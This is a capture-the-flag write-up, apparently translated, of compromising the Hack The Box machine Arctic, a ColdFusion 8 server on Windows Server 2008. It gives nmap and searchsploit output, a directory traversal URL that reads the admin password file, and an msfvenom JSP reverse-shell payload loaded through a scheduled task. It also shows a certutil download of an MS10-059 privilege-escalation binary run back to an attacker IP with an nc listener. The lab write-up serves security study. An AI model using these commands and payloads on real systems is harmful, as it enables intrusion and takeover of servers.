The 30 second response speed set by this target is really desperate. Seriously, you can play with your mobile phone for half a day every time you do an action
prospecting
nmap
nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 589.45 seconds
Found port 8500 open,
have access to nc Try connecting nc 10.10.10.11 8500 Wait 30 seconds and find a message returned HTTP/1.0 200 OK Date: Thu, 14 May 2020 18:48:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Server: JRun Web Server <html> <head> <title>Index of /</title></head><body bgcolor="#ffffff"> <h1>Index of /</h1><br><hr><pre><a href="CFIDE/">CFIDE/</a> <i>dir</i> 03/22/17 08:52 μμ <a href="cfdocs/">cfdocs/</a> <i>dir</i> 03/22/17 08:55 μμ </pre><hr></html>
Then open it on the web and find that you can browse the folder. After finding the CFIDE and cfdocs folders, you can determine that it is adobe's ColdFusion system. Then enter the / CFIDE/administrator folder and find the cfm8 version. Then search for any vulnerabilities
searchsploit coldfusion 8 1 ⨯ ---------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------- --------------------------------- Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | cfm/webapps/33167.txt Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl ---------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
There is an afe vulnerability and a widely circulated file browsing on baidu
We now have two ways to get the direction vector of the shell
Get tolis permission
RCE
First, exploit the afe vulnerability
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
Let's open this one and have a look
'CVE', '2009-2265' ],
[ 'OSVDB', '55684'],
Only pay attention to this one, because this is an msf exploit, and we can't directly exploit it, so we need to find a cve2009-2265 poc to exploit. Our poc is poc from exploit
Note that after copying and pasting, modify the host in the file,
if __name__ == '__main__':
# Define some information
lhost = '10.10.16.4'
lport = 4444
rhost = "10.10.10.11"
rport = 8500
filename = uuid.uuid4().hexModify lhost and lport
Interestingly, rhost does not need to be changed, which means that the author of this poc also wrote this poc when studying the htb target
The script here does not need nc listening, and the shell will be opened directly
File read vulnerability
Adobe ColdFusion - Directory Traversal - Multiple remote Exploit (exploit-db.com)
This is a script for vulnerability exploitation. If you had seen the official documents earlier, you wouldn't have studied it for a long time and couldn't poke the results. Therefore, don't look at the unreliable vulnerability exploitation strategies and honestly look at the official documents
Later, when I was using it, I forgot that the target machine was windows system. I searched according to the file system of linux, which wasted a lot of time. I once thought that this vulnerability had been fixed. Later, when I checked the file directory after using the first method to obtain the shell, I realized that the file system of win was different
Utilization method:
You can access it directly in the address bar according to the utilization mode
http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
In this way, you can access the password file and get the sha1 value of the password. Then you can log in to the background management system by using the decryption software
There is a file upload part in the background management, which can be used to obtain the shell in combination with file access
First create a jsp file with msf
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f raw > exp.jsp
Then open the python server
python -m SimpleHTTPServers 80
Then create a task to download the Trojan horse on our machine
debugging&Logging -> scheduled tasks -> schedule new task
Then fill in the address of the Trojan horse file at the url
Then we found that the file we uploaded was in the / CFIDE folder on port 8500. We directly click the file to execute, and then open the nc monitor here
nc -lvnp 4444
Done
Raise authority to root authority
Routine process
Want to use systeminfo to see the configuration
C:\>systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 14/5/2020, 9:38:49
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 261 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.199 MB
Virtual Memory: In Use: 848 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
Then use wes to see if there are any patches that haven't been patched. For usage, see the tool article
root@kali# /Windows-Exploit-Suggester/windows-exploit-suggester.py --database 2020-05-13-mssb.xls --systeminfo sysinfo [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits [*] there are now 197 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2008 R2 64-bit' [*] [M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical [M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important [E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical [*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC [*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC [*] [E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important [M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important [M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical [E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important [E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important [M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical [M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical [*] done
It is found that we can use a lot of ie vulnerabilities without entering the visual interface
- MS10-047
- MS10-059
- MS10-061
- MS10-073
- MS11-011
- MS13-005
We follow 0xdf to use ms10-059 vulnerability this GitHub from egre55
This is simple
After downloading
Upload can use python server and then transfer it with cerl
python -m SimpleHTTPServer 80 certutil.exe -urlcache -split -f "http://10.10.16.7/2. Exe "1.exe Download ./1.exe 10.10.16.7 4444 use
Remember to open nc to receive shell forwarding